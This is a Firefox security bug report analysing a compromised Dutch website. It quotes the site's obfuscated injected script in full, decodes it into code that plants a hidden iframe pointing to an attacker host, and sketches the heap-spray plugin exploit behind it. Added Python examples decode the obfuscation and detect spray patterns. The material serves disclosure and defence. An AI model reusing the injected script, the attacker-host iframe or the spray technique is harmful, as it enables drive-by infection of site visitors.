Bug 408063
Opened 18 years ago
Closed 18 years ago
Virus downloaded and placed in system32 folder
Categories
(Firefox :: Security, defect)
RESOLVED INVALID
People
(Reporter: imqqmi, Unassigned)
Attachments
(3 files, 2 obsolete files)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
This HTML script seems to use a security hole in Firefox to download a random virus/trojan horse every time the page is loaded. The filename is w32sysX.exe, where X is a number from 0 to 9. Viruses downloaded so far: Trojan horse Downloader.Generic6.YVH, Downloader.Obfuskated and Trojan horse Crypt.G. All caught by AVF Free edition.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0021)http://www.probuy.nl/ -->
<HTML><HEAD><TITLE>Probuy.nl</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="Internetsite Probuy" name=description>
<META content="index, follow" name=robots>
<META content="JSK Internet Solutions" name=author>
<META content="index, follow" name=robot>
<META content=all name=robots>
<META content=Nederlands/Dutch name=language>
<META content=1 name="revisit after">
<META content=Probuy name=keywords>
<META content="MSHTML 6.00.2800.1522" name=GENERATOR></HEAD>
<BODY><BR><BR>
<DIV align=center>
<CENTER>
<TABLE width="79%" border=0>
<TBODY>
<TR>
<TD width="33%"></TD>
<TD width="33%">
<P align=center></P></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%">
<DIV align=center>
<CENTER>
<TABLE width="63%" border=0>
<TBODY>
<TR>
<TD width="100%"></TD></TR></TBODY></TABLE></CENTER></DIV></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%"></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%">
<P align=center><B><FONT color=#3f4bff size=6>Welkom</FONT><FONT
color=#3f4bff size=4><BR></FONT><FONT color=#3f4bff
size=7>Wilkommen</FONT></B></P></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%"></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%"><IMG height=137 src="Probuy_nl_bestanden/pb1akopie.jpg"
width=511 border=0></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%"></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%">
<P align=center><FONT color=#3f4bff><B>Choose your
language:</B></FONT></P></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%">
<TABLE cellSpacing=15 width="100%" border=0>
<TBODY>
<TR>
<TD width="50%">
<P align=center><A href="http://www.probuy.nl/dutch/index.php"><IMG
height=57 src="Probuy_nl_bestanden/3dflagsdotcom_nethe_2fawm.gif"
width=84 border=0></A></P></TD>
<TD width="50%">
<P align=center><A
href="http://www.probuy.nl/germany/index.php"><IMG height=57
src="Probuy_nl_bestanden/3dflagsdotcom_gerna_2fawm.gif" width=84
border=0></A></P></TD></TR></TBODY></TABLE></TD>
<TD width="34%"></TD></TR>
<TR>
<TD width="33%"></TD>
<TD width="33%"></TD>
<TD width="34%"></TD></TR></TBODY></TABLE></CENTER></DIV>
<P> </P>
<SCRIPT src="Probuy_nl_bestanden/urchin.js" type=text/javascript>
</SCRIPT>
<SCRIPT type=text/javascript>
_uacct = "UA-846121-4";
urchinTracker();
</SCRIPT>
<!-- fc396cb8c998060159288dea5ed48db1 -->
<SCRIPT>document.write(unescape("%3Cscript%3Eif%28Rr%21%3D1%29%7Bfunction%20NL%28Ps%29%7Breturn%20Ps%7Dtry%7Bfunction%20saE%28pxw%29%7Breturn%20parseInt%28pxw%29%7Dvar%20rwz%3D%27jjQjUQjdQjhQjGQjDQjBQj7Qj4QjIQjFQjTQjYQjqQjHQjXQjxQjRQjcQjpQjfQjCQjoQjVQjiQj5QjbQjJQjeQjlQjNQjzQjkQj3Qj8QjyQjZQjOQjaQjmQjtQjWQjrQjgQjsQjnQjSQj9QjAQjMQj6QjPQjLQjKQUjQUUQUdQUhQUGQUDQUBQU7QU4QUIQUFQUTQUYQUqQUHQUXQUxQURQUcQUpQUfQUCQUoQUV%27%3B%20var%20bWh%3DNL%28%27Q%27%29%2C%20bNW%3DArray%2810301%5E10361%2CsaE%28%2711%27%29%2CsaE%28%2727%27%29%2CsaE%28%2710%27%29%2CsaE%28%2717%27%29%2CsaE%28%278%27%29%2C16617%5E16613%2CsaE%28%2770%27%29%2CsaE%28%27117%27%29%2C9249%5E9299%2CsaE%28%2730%27%29%2C13114%5E13111%2CsaE%28%2722%27%29%2C26416%5E26407%2CsaE%28%2788%27%29%2C29978%5E29995%2CsaE%28%2762%27%29%2C8590%5E8599%2C25980%5E25961%2CsaE%28%2729%27%29%2C19173%5E19125%2CsaE%28%2781%27%29%2CsaE%28%273%27%29%2C18976%5E18981%2C29367%5E29409%2CsaE%28%271%27%29%2C25634%5E25703%2C8272%5E8225%2CsaE%28%2716%27%29%2CsaE%28%2766%27%29%2C23142%5E23097%2C25703%5E25723%2CsaE%28%2775%27%29%2CsaE%28%2720%27%29%2C412%5E387%2CsaE%28%2784%27%29%2CsaE%28%2787%27%29%2C1945%5E1943%2C3364%5E3383%2C13073%5E13095%2CsaE%28%2732%27%29%2C10409%5E10375%2CsaE%28%2773%27%29%2C23662%5E23637%2C31486%5E31473%2CsaE%28%2760%27%29%2CsaE%28%2767%27%29%2C22897%5E22877%2C13508%5E13463%2CsaE%28%2764%27%29%2C30285%5E30211%2CsaE%28%2776%27%29%2C26191%5E26119%2CsaE%28%2790%27%29%2C30251%5E30251%2CsaE%28%2763%27%29%2CsaE%28%2753%27%29%2C3418%5E3441%2CsaE%28%2789%27%29%2C1159%5E1213%2C28516%5E28489%2CsaE%28%2742%27%29%2C7973%5E7953%2C15215%5E15221%2CsaE%28%274%27%29%2C31234%5E31301%2CsaE%28%2735%27%29%2CsaE%28%2738%27%29%2CsaE%28%2785%27%29%2C7865%5E7867%2C1904%5E1841%2C11756%5E11721%2C30743%5E30771%2C1818%5E1837%2C21089%5E21035%2CsaE%28%2777%27%29%2CsaE%28%2779%27%29%2C13723%5E13769%29%3B%20var%20JaC%2C%20WoH%3B%20var%20tXb%2C%20WzT%3D%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%27%3B%20var%20VrK%3DString%28%29%3Brwz%3Drwz.split%28bWh%29%3Bfor%20%28JaC%3D0%3BJaC%3CWzT.length%3BJaC+%3D2%29%7BtXb%3DWzT.substr%28JaC%2C2%29%3Bvar%20nID%3Drwz.length%3Bfor%28WoH%3D0%3BWoH%3CnID%3BWoH++%29%20%7Bif%281%3D%3D0%29%3Bif%28rwz%5BWoH%5D%3D%3DtXb%29break%3B%7DVrK+%3DString.fromCharCode%28bNW%5BWoH%5D%5E120%29%3B%20%7Ddocument.write%28VrK%29%3B%7Dcatch%28ygF%29%7B%7D%7Dvar%20Rr%3D1%3C/script%3E"))</SCRIPT>
<!--/--></BODY></HTML>
Reproducible: Always
Steps to Reproduce:
1. Just load the above site, or copy/paste the above HTML into an .html file and open it using Firefox.
Actual Results:
After Firefox/the script downloads the file and places it in %systemroot%\system32, Firefox just quits or hangs.
Expected Results:
A virus is downloaded. Whether the virus is also run is unknown.
I can't see the site appearing on this message. Here it is again:
http://www.probuy.nl
Comment 2•18 years ago
The payload decodes twice to become:
function IFrame(){}
IFrame.prototype = {
  host : 'update3.classictel.org',
  path : '/drivers/',
  cookieName : 'dXupaet',
  cookieValue : 1,
  // marks the browser for 24 hours so the iframe is injected only once per victim
  setCookie : function(name, value) {
    var d = new Date();
    d.setTime(new Date().getTime() + 86400000);
    document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString();
  },
  // writes a 1x1 invisible iframe pointing at the attacker host, then sets the marker cookie
  install : function() {
    if (!this.alreadyInstalled()) {
      var s = "<iframe width=1 height=1 frameBorder=0 src='" + this.getFrameURL() + "'></iframe>";
      try {
        document.write(s)
      } catch(e) {
        document.write("<html><body>" + s + "</body></html>")
      }
      this.setCookie(this.cookieName, this.cookieValue);
    }
  },
  // builds http://<victim host>.<16 random hex chars>.update3.classictel.org/drivers/
  // so every infected site gets its own wildcard subdomain on the attacker's domain
  getFrameURL : function() {
    var dlh = document.location.host;
    return 'http://' + ((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') +
      dlh.replace(/[^a-z0-9.-]/, '.').replace(/\.+/, '.') + "." +
      this.getRandString() + "." + this.host + this.path;
  },
  // true once the marker cookie is present (the original has the return on one line)
  alreadyInstalled : function() {
    return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
  },
  // 16 random lowercase hex characters
  getRandString : function() {
    var l = 16, c = '0123456789abcdef', o = '';
    for (var i = 0; i < l; i++)
      o += c.substr(Math.floor(Math.random() * c.length), 1, 1);
    return o;
  }
}
var o = new IFrame(); o.install();
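As an added analysis example (not part of the bug report or of any Mozilla code), the following Python reproduces the two decoding steps that turn the pasted `<SCRIPT>` into the code above. The outer layer is a plain `unescape()`; the inner layer is a token-substitution scheme whose alphabet, integer table and token string are taken from the script's `rwz`, `bNW` and `WzT` variables. Only the first 14 table entries and the opening tokens are copied from the page here, enough to show the decoder recovering `<script>\r\nfunction`.

```python
# Added example (not from the bug report): decoder for the inner layer of the
# pasted <SCRIPT>. After the outer unescape() the script holds a token
# alphabet (rwz, split on 'Q'), a parallel integer table (bNW) and a long
# token string (WzT); each 2-char token of WzT selects an index into the
# alphabet and table[index] ^ 120 is one character of the real payload.
from urllib.parse import unquote

XOR_KEY = 120  # the constant in String.fromCharCode(bNW[WoH]^120)


def peel_outer_layer(html_script: str) -> str:
    """Undo the document.write(unescape("...")) wrapper: plain URL decoding."""
    return unquote(html_script)


def decode_token_layer(alphabet: str, table: list[int], encoded: str,
                       sep: str = "Q", key: int = XOR_KEY) -> str:
    """Replicates the decode loop: token -> alphabet index -> table[i] ^ key."""
    tokens = alphabet.split(sep)
    index = {tok: i for i, tok in enumerate(tokens)}
    out = []
    for pos in range(0, len(encoded), 2):
        tok = encoded[pos:pos + 2]
        # The original loop runs off the end of the table on an unknown token
        # and silently emits a bogus character; fail loudly instead.
        if tok not in index:
            raise ValueError(f"token {tok!r} at offset {pos} not in alphabet")
        out.append(chr(table[index[tok]] ^ key))
    return "".join(out)


# First 14 alphabet tokens and table entries exactly as they appear in the
# pasted script (XOR pairs written the way the script computes them), and
# the opening tokens of its WzT string.
ALPHABET_PREFIX = "jjQjUQjdQjhQjGQjDQjBQj7Qj4QjIQjFQjTQjYQjq"
TABLE_PREFIX = [10301 ^ 10361, 11, 27, 10, 17, 8, 16617 ^ 16613, 70,
                117, 9249 ^ 9299, 30, 13114 ^ 13111, 22, 26416 ^ 26407]
ENCODED_PREFIX = "jjjUjdjhjGjDjBj7j4jIjFjTjYjdjBjGjqjY"


def decode_page_prefix() -> str:
    """Decode the page's own opening tokens: '<script>\\r\\nfunction'."""
    return decode_token_layer(ALPHABET_PREFIX, TABLE_PREFIX, ENCODED_PREFIX)


if __name__ == "__main__":
    print(repr(decode_page_prefix()))
```

Feeding the full `rwz`, `bNW` and `WzT` values from the pasted script into `decode_token_layer` yields the complete IFrame code shown in this comment.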
Comment 3•18 years ago
www.probuy.nl doesn't have the obfuscated <script> tag anymore; they were probably hacked and then cleaned it up.
Could you attach that HTML file rather than pasting it in the comment?
Comment 5•18 years ago
An example url loaded in the iframe is:
<http://probuy.nl.063c9c9cf379ce64.update3.classictel.org/drivers/>
The script alone crashed a Bon Echo build on Linux.
Comment 7•18 years ago
without the comments.
Attachment #292795 -
Attachment is obsolete: true
Attachment #292796 -
Attachment is obsolete: true
Comment 9•18 years ago
And that page contains (comments from me):
<script>
function getPayload( /* machine code to download bad stuff */ )
// classic NOP-slide + heap-spray technique
var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do { s += s }
while (s.length<0x0900000);
s+=unescape (getpayload());
</script>
<embed src="reallyreallylongstring.wmv">
</embed>
This is an exploit of the Windows Media Player Plugin (Microsoft advisory MS06-06) -- please, please upgrade your wmp plugin IMMEDIATELY. Microsoft patched this in February 2006.
If this plugin is that out of date please check all your others. Type about:plugins in the browser location bar and uninstall any you don't use, and for the others please check with the vendors that you have the latest. There have been lots of exploits released for all media players, including recently the popular QuickTime (should be 7.3), Java (should be 1.6_03), and Flash (should be 9.0 r115).
This is not a flaw in Firefox. We are working on ways to alert users to out of date plugins in future versions of Firefox.
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Resolution: --- → INVALID
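As an added detection-side example (not from the bug report or from Mozilla), here is a static heuristic in Python for the heap-spray shape quoted in the comment above; the regexes, thresholds and the two sample documents are constructed for this illustration and are not taken from the exploit page.

```python
# Added example (not from the bug report): static heuristics for the heap-spray
# shape sketched above: a short unescape("%u....") seed made of one repeated
# word, a self-doubling loop, a multi-megabyte length target, and a plugin
# <embed> with an abnormally long src. Regexes, thresholds and samples are
# constructed for this illustration.
import re

SEED_RE = re.compile(r'unescape\s*\(\s*["\']((?:%u[0-9a-fA-F]{4}){4,})["\']')
DOUBLE_RE = re.compile(r'\b(\w+)\s*\+=\s*\1\b')
LENGTH_RE = re.compile(r'\.length\s*<\s*(0x[0-9a-fA-F]+|\d+)')
EMBED_RE = re.compile(r'<embed[^>]+src=["\']([^"\']+)["\']', re.IGNORECASE)
SPRAY_BYTES = 1 << 20   # growing a string past 1 MiB is rarely legitimate
LONG_SRC = 200          # plugin filenames longer than this are suspicious


def spray_indicators(script: str) -> list[str]:
    """Return the heuristics that fire on one HTML/JS document (empty = none)."""
    hits = []
    for seed in SEED_RE.finditer(script):
        words = set(re.findall(r'%u([0-9a-fA-F]{4})', seed.group(1)))
        if len(words) == 1:  # e.g. %u4141 repeated: a NOP-sled-style filler
            hits.append("repeated %u seed word " + words.pop())
            break
    if DOUBLE_RE.search(script):
        hits.append("self-doubling concatenation (s += s)")
    m = LENGTH_RE.search(script)
    if m:
        v = m.group(1)
        target = int(v, 16) if v.lower().startswith("0x") else int(v)
        if target >= SPRAY_BYTES:
            hits.append(f"length target {v} ({target} bytes)")
    e = EMBED_RE.search(script)
    if e and len(e.group(1)) > LONG_SRC:
        hits.append(f"embed src of {len(e.group(1))} characters")
    return hits


# Constructed samples: one mirroring the pattern in the comment, one benign.
LONG_NAME = "A" * 600  # stand-in for the very long media filename
SPRAY_SAMPLE = (
    '<script>\n'
    'var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");\n'
    'do { s += s }\nwhile (s.length<0x0900000);\n'
    's+=unescape(getPayload());\n</script>\n'
    '<embed src="' + LONG_NAME + '.wmv"></embed>\n'
)
BENIGN_SAMPLE = '<script>var t = unescape("%u0048%u0069"); document.title = t;</script>'

if __name__ == "__main__":
    print(spray_indicators(SPRAY_SAMPLE), spray_indicators(BENIGN_SAMPLE))
```

Any one indicator alone is weak (legitimate code concatenates strings too); the combination of a repeated seed word, a doubling loop and a multi-megabyte target is what makes the sample stand out.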
Updated•18 years ago
Group: security